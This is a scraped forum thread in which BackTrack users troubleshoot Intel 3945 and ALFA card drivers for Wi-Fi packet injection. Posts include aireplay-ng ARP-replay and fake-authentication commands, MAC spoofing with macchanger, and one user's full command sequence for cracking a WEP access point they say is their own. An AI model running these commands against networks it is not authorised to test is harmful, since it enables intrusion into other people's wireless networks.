My alfa led is off as well. In vmware look for an addon button. Also try YouTube vmware backtrack videos that might help. I use virtualbox. The last time I got it to work was in backtrack 2.Originally Posted by BStep
Got it to work. Somehow. Followed some references from "iceman_3233" post,played with some vmware settings.
In fact, still can't connect but the ALFA i visible. Wicd manager is stuck at "obtaining ip address" for some time. Than "not connected". While trying anything, led on ALFA is off all the time. But can see wireless networks.
My alfa led is off as well. In vmware look for an addon button. Also try YouTube vmware backtrack videos that might help. I use virtualbox. The last time I got it to work was in backtrack 2.
The enemy is no longer ignorance - It is vigilance
this turned out to be a great work-around as the BT4pf 3945 drivers dont work on channels 12-14 and these ones do so thanks fella
Thanks to everyone who has contributed towards bt3 and all the other great tools within it, especially shamanvirtuel, spoonwpa is just awesome to a noob like me. hope you find somewhere to live.
Seriously, this problem is growing long in the tooth. I have searched high and low and tons of people claim that aireplay-ng works fine just using the iwlwifi drivers. The -9 test is the only thing that works for me. The -3 ARP injection functionality does nothing. I try to install the ipwraw setup and it fails on the make. Apparently neither solution works and I could really use some help, especially getting the iwlwifi drivers to properly perform ARP injection. If you're concerned about security and prefer to PM me that's fine but I really need some direction here...
Hello everyone
Same problem where. same wireless card
Code:root@bt:~# sudo lshw -C network *-network description: Ethernet interface product: L1 Gigabit Ethernet Adapter vendor: Attansic Technology Corp. physical id: 0 bus info: pci@0000:02:00.0 logical name: eth0 version: b0 serial: 00:1e:8c:29:3b:66 capacity: 1GB/s width: 64 bits clock: 33MHz capabilities: pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration: autonegotiation=on broadcast=yes driver=atl1 driverversion=2.1.3 firmware=N/A latency=0 link=no multicast=yes port=twisted pair *-network description: Wireless interface product: PRO/Wireless 3945ABG [Golan] Network Connection vendor: Intel Corporation physical id: 0 bus info: pci@0000:03:00.0 logical name: wmaster0 version: 02 serial: 00:1c:bf:5e:84:3b width: 32 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list logical ethernet physical wireless configuration: broadcast=yes driver=iwl3945 ip=XX.XX.XX.XX latency=0 module=iwl3945 multicast=yes wireless=IEEE 802.11abg
Tried it all...
In BT3 ipwraw drivers used to work fine...
In BT4 tried installing them but got erros in the make command.
I tried everything
aireplay-ng -9 wlan0 reports injection capable:
I started to airodump in mon0Code:root@bt:~# aireplay-ng -9 wlan0 23:04:24 Trying broadcast probe requests... 23:04:24 Injection is working! 23:04:26 Found 1 AP 23:04:26 Trying directed probe requests... 23:04:26 00:14:7F:71:76:7F - channel: 1 - 'SpeedTouchD53AD3' 23:04:26 Ping (min/avg/max): 1.239ms/8.870ms/95.915ms Power: -86.96 23:04:26 28/30: 93%
aireplay-ng -1 and aireplay-ng -3 in wlan0
I wait for a while and get an ARP packet, it then starts to send thousands of packets but but ARP count and Data count remain the same (low)
I've pass through all the steps reported where and still can't get injection...Code:root@bt:~# aireplay-ng -3 -b 00:24:B2:79:86:82 -h 00:16:44:F9:7E:32 wlan0 00:26:52 Waiting for beacon frame (BSSID: 00:24:B2:79:86:82) on channel 6 Saving ARP requests in replay_arp-0128-002652.cap You should also start airodump-ng to capture replies. Read 46916 packets (got 1 ARP requests and 14 ACKs), sent 189395 packets...(499 pps)
Can anyone help???
Thanks
I have to agree with the above posters. BT3 works very well using the ipwraw drivers on the Intel 3945. BT4 final is at best patchy; you can enable monitor mode, associate and capture but the capture rate is very slow rate indeed.
We must therefore be patient and wait for an effective update to the BT4 iso to return the lost i3945 functionality.
After you tried an aireplay -3 run could you try a 'dmesg' and see if "rtc timeout" messages are displayed? Because that seems to be the regular problem... Somehow the driver/kernel/whatever does not seem to be able to keep up with the packet rate?
(And offtopic, I also purchased and received an 1W, Alpha AWUS036H.. Works perfectly out of the box with BT4!)
Hello there EgWel
This is what I get:
Code:aireplay-ng -3 -b 00:26:F2:0B:FB:95 -h 00:16:44:F9:7E:32 wlan0 CH 12 ][ BAT: 1 hour 38 mins ][ Elapsed: 2 mins ][ 2010-02-01 18:40 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:F2:0B:FB:95 177 100 1379 2 0 12 54 WEP WEP ZON-6322 BSSID STATION PWR Rate Lost Packets ProbesCode:root@bt:~# aireplay-ng -3 -b 00:26:F2:0B:FB:95 -h 00:16:44:F9:7E:32 wlan0 18:37:55 Waiting for beacon frame (BSSID: 00:26:F2:0B:FB:95) on channel 12 Saving ARP requests in replay_arp-0201-183755.cap You should also start airodump-ng to capture replies. Read 4966 packets (got 2 ARP requests and 0 ACKs), sent 53749 packets...(499 pps)Hope this helpsCode:root@bt:~# dmesg ADDRCONF(NETDEV_UP): wlan0: link is not ready device mon0 entered promiscuous mode device wlan0 entered promiscuous mode hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts __ratelimit: 62 callbacks suppressed hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts . . . hpet1: lost 1 rtc interrupts __ratelimit: 661 callbacks suppressed hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts
P.S.-Thanks for the tip about the Alpha AWUS036H but I'm not about to buy one just to be back at square one the next time another Backtrack version comes out.If this works out for some it should work for all... I Think.....
Update
After EgWel suggestion I remembered that I had a USB dongle that came with my first router a Sitecom.
Decided to give it a try and voilà successful cracked my AP in 9 min.
Where are some outputs:
Used the same methodCode:root@bt:~# airmon-ng stop wlan1 Interface Chipset Driver wlan0 Intel 3945 a/b/g iwl3945 - [phy0] wlan1 Ralink 2573 USB rt73usb - [phy1] (monitor mode disabled) root@bt:~# ifconfig wlan1 down root@bt:~# macchanger --mac 00:16:44:F9:7E:32 wlan1 Current MAC: 00:0c:f6:22:08:3b (Sitecom Europe Bv) Faked MAC: 00:16:44:f9:7e:32 (unknown) root@bt:~# iwconfig wlan1 rate 1M root@bt:~# iwconfig wlan1 mode monitor root@bt:~# iwconfig wlan1 channel 6 root@bt:~# ifconfig wlan1 up root@bt:~# airmon-ng start wlan1 Interface Chipset Driver wlan0 Intel 3945 a/b/g iwl3945 - [phy0] wlan1 Ralink 2573 USB rt73usb - [phy1] (monitor mode enabled on mon0) root@bt:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11abg ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated Tx-Power=0 dBm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 wmaster1 no wireless extensions. wlan1 IEEE 802.11bg Mode:Monitor Frequency:2.437 GHz Tx-Power=10 dBm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 mon0 IEEE 802.11bg Mode:Monitor Frequency:2.437 GHz Tx-Power=10 dBm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
airodump on mon0 and aireplay on wlan1
after first ARP it worked like a charm...
this is the output from dmesg:
the difference between rt73usb and iwl3945 drivers isCode:rt73usb 2-4:1.0: firmware: requesting rt73.bin device mon0 entered promiscuous mode device wlan1 entered promiscuous mode hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts hpet1: lost 1 rtc interrupts
instead of:Code:t73usb 2-4:1.0: firmware: requesting rt73.bin
those this points someone in a direction???Code:ADDRCONF(NETDEV_UP): wlan0: link is not ready
I would steel like to be dongle free and use iwl3945 drivers if I could...
Thanks
Posting Permissions